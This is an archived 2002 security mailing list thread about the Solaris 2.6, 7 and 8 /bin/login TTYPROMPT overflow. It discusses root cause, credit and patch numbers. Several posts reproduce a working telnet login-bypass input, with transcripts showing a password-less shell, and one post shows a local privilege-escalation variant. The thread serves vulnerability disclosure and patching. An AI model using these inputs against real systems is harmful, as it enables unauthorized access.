Re: Solaris 2.6, 7, 8

2002-10-05 Thread Sebastian 


Hi.


On Wed, Oct 02, 2002 at 12:00:38PM -0400, buzheng wrote:

> But, the remote setting of TTYPROMPT does matter. you can not succeed in
> login without remotely changing the TTYPROMPT. This is also the bug
> mentioned in Jonathan's original letter (bid:5531).
 
Which is plain wrong. This may be true for the 64 times " c" method, but in
the generic case it does not matter.

The second bug in login, where login walks out of a 64 (char *) array can be
exploited remotely to gain root privileges even if you cannot login as root
legally and even if you do not touch TTYPROMPT at all.


> If you have applied patches for these 2 bugs, you are safe now.
 
And everybody should have done so since November 2001.


> -- 
> bu,zheng <[EMAIL PROTECTED]>
 
ciao,
Sebastian

-- 
-. [EMAIL PROTECTED] -. + http://segfault.net/~scut/ `.
-' segfault.net/~scut/pgp `' 5453 AC95 1E02 FDA7 50D2 A42D 427E 6DEF 745A 8E07
`- project grasp infiltrated, phantom works falling. hi echelon! '

RE: Solaris 2.6, 7, 8

2002-10-04 Thread Morgan 

This is nothing more than a newly disclosed way of exploiting an old
bug, hardly newsworthy unless you're in the dot slash hacking business.  In
the spirit of giving credit where credit is due, I'd like to note that the
bug was originally found by duke (ISS/ADM) of course. This method of
exploitation, to the best of my knowledge, was first used by brian
mcwilliams(bmcw@AOLIM).
This is very similar too how I exploited it, but instead of using fflag
to force auth, I used malloc.  The problem is in the getargs function inside
login, which is called in multiple places.  A buffer is parsed into a static
char pointer array of size 64. Whitespace is a seperator, and no bounds
checking is done. Patch has been available for a long time, but you dont
need it if you use ISS IDS, because you are automatically protected
according to ISS's statement..
>ISS RealSecure Network Sensor customers are currently protected from
>this vulnerability. Support for this issue was included in X-Press
>Update version 3.3 as the "TelnetExcessiveTabs" signature. This
>signature will be included in the next RealSecure Server Sensor.

>ISS Internet Scanner X-Press Update 6.1 for Internet Scanner version
>6.2.1 included support for this issue with the TelnetTabBO check.

>ISS BlackICE customers are protected from this vulnerability by the
>"2000902 Telnet login name overflow" signature.

original findings by duke:
http://xforce.iss.net/alerts/advise105.php

my exploit:
http://archives.neohapsis.com/archives/bugtraq/2002-03/0218.html

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Gert-Jan Hagenaars 

Apparently, Dave Ahmad wrote:
% 
% These may be fixes for this vulnerablity, however they apply to telnetd
% and this vulnerability has to be in login.

So it makes more sense to apply the right patches to login, and not
patches to telnetd.  If you only want to install the necessary patches
to plug this specific hole, very quickly, use these:

solaris 8 login fix: 111085-02
solaris 7 login fix: 112300-01
solaris 2.6 login fix: 105665-04
solaris 2.5.1 login fix: 106160-02

use patchadd.  A reboot is not necessary.

During your normal maintenance window you should install the rest of the
recommended patches.

CHeers,
Gert-Jan.

-- 
+  + --- ++ - +0+ + ++ +++ +  +
sed '/^[when][coders]/!d G.J.W. Hagenaars -- gj at hagenaars dot com
/^...[discover].$/d  Remembering Mike Carty 1968-1994
   /^..[real].[code]$/!d UltrixIrixAIXHPUXSunOSLinuxBSD, nothing but nix
' /usr/dict/wordsI'm Dutch, what's _your_ excuse?

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ramon Kagan 

Another thing,  if you tcpwrap your telnet sessions, you can prevent
localhost telnets.

Ramon Kagan
York University, Computing and Network Services
Unix Team -  Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]

-
I have not failed.  I have just
found 10,000 ways that don't work.
- Thomas Edison
-

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
>
> Example:
>
> coma% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
>
> SunOS 5.8
>
> bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> Last login: whenever
> $ whoami
> bin
>
> Jonathan Stuart
> Network Security Engineer
> Computer Consulting Partners, Ltd.
> E-mail: [EMAIL PROTECTED]
>
>

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Marco Ivaldi 

On Wed, 2 Oct 2002, buzheng wrote:

> I do not think this is a new bug.

I completely agree.

> But, the remote setting of TTYPROMPT does matter. you can not succeed in
> login without remotely changing the TTYPROMPT. This is also the bug
> mentioned in Jonathan's original letter (bid:5531).

That's why this bug is not exploitable using remote applications like
rlogin, ssh (at least if you are not crazy enough to enable UseLogin
option) or X.25 pad: rlogin and pad aren't able to pass env vars others
than TERM, while ssh normally don't uses /bin/login for user authentication.

> If you have applied patches for these 2 bugs, you are safe now.
>
> BTW: you can change multiple "c "s to "a=b"s, actually, since SYS V
> login treat " " as environ var separator, you can also use >=64 words
> separated by " " or "\t". they will all work.

Agreed as well.

:raptor
Antifork Research, Inc. ITBH Italian Black Hats
http://www.0xdeadbeef.eu.orghttp://elite.blackhats.it

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ramon Kagan 

Sorry but I can't reproduce this on a Solaris 7 machine.

sunlight.ccs% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.


SunOS 5.7

login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
Login incorrect


As you can see I get a request for a username/password.

Ramon Kagan
York University, Computing and Network Services
Unix Team -  Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]

-
I have not failed.  I have just
found 10,000 ways that don't work.
- Thomas Edison
-

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
>
> Example:
>
> coma% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
>
> SunOS 5.8
>
> bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> Last login: whenever
> $ whoami
> bin
>
> Jonathan Stuart
> Network Security Engineer
> Computer Consulting Partners, Ltd.
> E-mail: [EMAIL PROTECTED]
>
>

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ido Dubrawsky 

On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
> Hello,
> 
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
> 
Looks like Solaris 9 is not vulnerable to this:

[idubraws@elrond idubraws]
6 $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 192.168.155.2
Trying 192.168.155.2...
Connected to 192.168.155.2.
Escape character is '^]'.


SunOS 5.9

login:


It automatically drops you to the login prompt.  Perhaps this is fixed by a 
patch that got rolled into 9?

Ido
-- 
===
|Ido Dubrawsky   E-mail: [EMAIL PROTECTED]
 |  |   |Network Consulting Engineer
:|::|:  |VSEC Technical Marketing, SAFE Architecture
   :|||:  :|||: |Cisco Systems, Inc.
.:|||:..:|||:.  |Austin, TX. 78759
===




msg09296/pgp0.pgp
Description: PGP signature

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Dan Diamond 

In-Reply-To: <[EMAIL PROTECTED]>

This exploit can also be done local to gain higher priv's
tester#TTYPROMPT=aa;export TTYPROMPT
tester#exec login
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c 
c c c c c c c c c c c c c c c/n
tester:bin#

Patches to resolve are:
2.6 105665-04
2.7 112300-01
2.8 111085-01

Re: Solaris 2.6, 7, 8

2002-10-03 Thread Roy Kidder 

Works like a champ on Solaris 2.6/Sparc:


-- begin --

~ $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.


SunOS 5.6

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: Thu Oct  3 14:49:33 from localhost
Sun Microsystems Inc.   SunOS 5.6   Generic August 1997
You have new mail.
bin@ovcle$ uname -a
SunOS ovcle 5.6 Generic_105181-14 sun4u sparc SUNW,Ultra-4
bin@ovcle$ who am i 
binpts/6Oct  3 15:05(localhost)

-- begin --





On Wed, 2002-10-02 at 13:23, Ramon Kagan wrote:
> Sorry but I can't reproduce this on a Solaris 7 machine.
> 
> sunlight.ccs% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> 
> 
> SunOS 5.7
> 
> login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
> Login incorrect
> 
> 
> As you can see I get a request for a username/password.
> 
> Ramon Kagan
> York University, Computing and Network Services
> Unix Team -  Intermediate System Administrator
> (416)736-2100 #20263
> [EMAIL PROTECTED]
> 
> -
> I have not failed.  I have just
> found 10,000 ways that don't work.
>   - Thomas Edison
> -
> 
> On Wed, 2 Oct 2002, Jonathan S wrote:
> 
> > Hello,
> >
> >   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> > environment variable TTYPROMPT.  This vulnerability has already been
> > reported to BugTraq and a patch has been released by Sun.
> >   However, a very simple exploit, which does not require any code to be
> > compiled by an attacker, exists.  The exploit requires the attacker to
> > simply define the environment variable TTYPROMPT to a 6 character string,
> > inside telnet. I believe this overflows an integer inside login, which
> > specifies whether or not the user has been authenticated (just a guess).
> > Once connected to the remote host, you must type the username, followed by
> > 64 " c"s, and a literal "\n".  You will then be logged in as the user
> > without any password authentication.  This should work with any account
> > except root (unless remote root login is allowed).
> >
> > Example:
> >
> > coma% telnet
> > telnet> environ define TTYPROMPT abcdef
> > telnet> o localhost
> >
> > SunOS 5.8
> >
> > bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> > Last login: whenever
> > $ whoami
> > bin
> >
> > Jonathan Stuart
> > Network Security Engineer
> > Computer Consulting Partners, Ltd.
> > E-mail: [EMAIL PROTECTED]
> >
> >
> 
-- 
===
Roy Kidder
Data Network Engineer
CoreComm
---
"...these products' frequent failures are 
legitimized by ubiquitous acquiescence." 
 -- Doc Searls on Microsoft products.
===

Re: Solaris 2.6, 7, 8

2002-10-03 Thread tb0b 

On Wed, 02 Oct 2002, you wrote:
> But, the remote setting of TTYPROMPT does matter. you can not succeed in
> login without remotely changing the TTYPROMPT. This is also the bug
> mentioned in Jonathan's original letter (bid:5531).

I have heard several conflicting reports on this matter and there are at least
two published exploits for the Solaris login overflow (by [EMAIL PROTECTED] and
[EMAIL PROTECTED]) that do *not* explicitly set the TTYPROMPT environment
variable.

If somone (perhaps somone from Sun) could clarify this matter once and for all
i would be most gratefull.

-tb0b

-- 
tb0b, Nietzschean.
No Religion. No Flag. No Phear.

http://bitterness.primitive-incision.co.uk/

   
   `Who said anything about cutting you up man?
I just wanted to carve a little `z' on your forehead.'
-Dr Gonzo, "Fear and Loathing in Las Vagas"

RE: Solaris 2.6, 7, 8

2002-10-02 Thread Sinan Eren 


the problem is there exists an authentication flag called the "fflag" just after the 
array that gets overflowed in the .bss segment. this is an array of char pointers so 
when it is overflowed becuase of an mismanagement on the indexing of this array the 
fflag gets overwritten with an valid address on .bss segment. this is good enough to 
satify the if(fflag) condition and spawn a shell.

some truth about this finding;
There is an exploit out in the wild for sometime and the example pattern shown by 
Jonathan is exactly thesame with the payload of that exploit. so i'm curious about 
this findings origin, i think credits must be given due... i'll be waiting for a 
clerification form Mr. Stuart. 

thanks,
sinan

-Original Message-
From: Jonathan S [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, October 02, 2002 9:13 AM
To: [EMAIL PROTECTED]
Subject: Solaris 2.6, 7, 8


Hello,

  Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT.  This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
  However, a very simple exploit, which does not require any code to be
compiled by an attacker, exists.  The exploit requires the attacker to
simply define the environment variable TTYPROMPT to a 6 character string,
inside telnet. I believe this overflows an integer inside login, which
specifies whether or not the user has been authenticated (just a guess).
Once connected to the remote host, you must type the username, followed by
64 " c"s, and a literal "\n".  You will then be logged in as the user
without any password authentication.  This should work with any account
except root (unless remote root login is allowed).

Example:

coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin

Jonathan Stuart
Network Security Engineer
Computer Consulting Partners, Ltd.
E-mail: [EMAIL PROTECTED]

Re: Solaris 2.6, 7, 8

2002-10-02 Thread Christopher X. Candreva 

On Wed, 2 Oct 2002, Dave Ahmad wrote:

> I suggest that everyone here who still uses telnet disable it immediately.

 . . or install the latest Recomended patch cluster, which you should have
done anyway.

> These may be fixes for this vulnerablity, however they apply to telnetd
> and this vulnerability has to be in login.

There are patches for /bin/login as well  On Solaris 8 it's 111085-02, dated
Dec 13 2001:

I haven't been able to reproduce this on a system with 111085-02 installed.


==
Chris Candreva  -- [EMAIL PROTECTED] -- (914) 967-7816
WestNet Internet Services of Westchester
http://www.westnet.com/

Re: Solaris 2.6, 7, 8

2002-10-02 Thread buzheng 

I do not think this is a new bug. 

Actually, the overflow is not at changing the ttyprompt remotely.
in fact, if you just use "a", instead of "abcdef",  as TTYPROMPT, it will
still work.
the overflow is that long user name with multiple space, all the "c "
will be taken as environment. it is the very bug of SYS V derived login
buffer overflow. bid:3681. 

But, the remote setting of TTYPROMPT does matter. you can not succeed in
login without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).

If you have applied patches for these 2 bugs, you are safe now.

BTW: you can change multiple "c "s to "a=b"s, actually, since SYS V
login treat " " as environ var separator, you can also use >=64 words
separated by " " or "\t". they will all work.

-- 
bu,zheng <[EMAIL PROTECTED]>

Re: Solaris 2.6, 7, 8

2002-10-02 Thread Dave Ahmad 


I have confirmed this on a fresh Solaris 8/sparc install.

Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
Last login: Wed Oct  2 10:47:12 from localhost
Sun Microsystems Inc.   SunOS 5.8   Generic February 2000
$ id
uid=2(bin) gid=2(bin)

I suggest that everyone here who still uses telnet disable it immediately.

These may be fixes for this vulnerablity, however they apply to telnetd
and this vulnerability has to be in login.

Solaris 8: 110668-03
Solaris 8x86: 110669-03

Solaris 7: 107475-04
Solaris 7x86: 107476-04

Solaris 2.6: 106049-04
Solaris 2.6x86: 106050-04

Solaris 2.5.1: 103640-40
Solaris 2.5.1x86: 103641-40

If these are "band-aid" fixes that simply cause telnetd to not pass
TTYPROMPT to /bin/login, the setuid executable may still be exploitable
locally.

David Ahmad
Symantec
KeyID: 0x26005712
Fingerprint: 8D 9A B1 33 82 3D B3 D0 40 EB  AB F0 1E 67 C6 1A 26 00 57 12

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).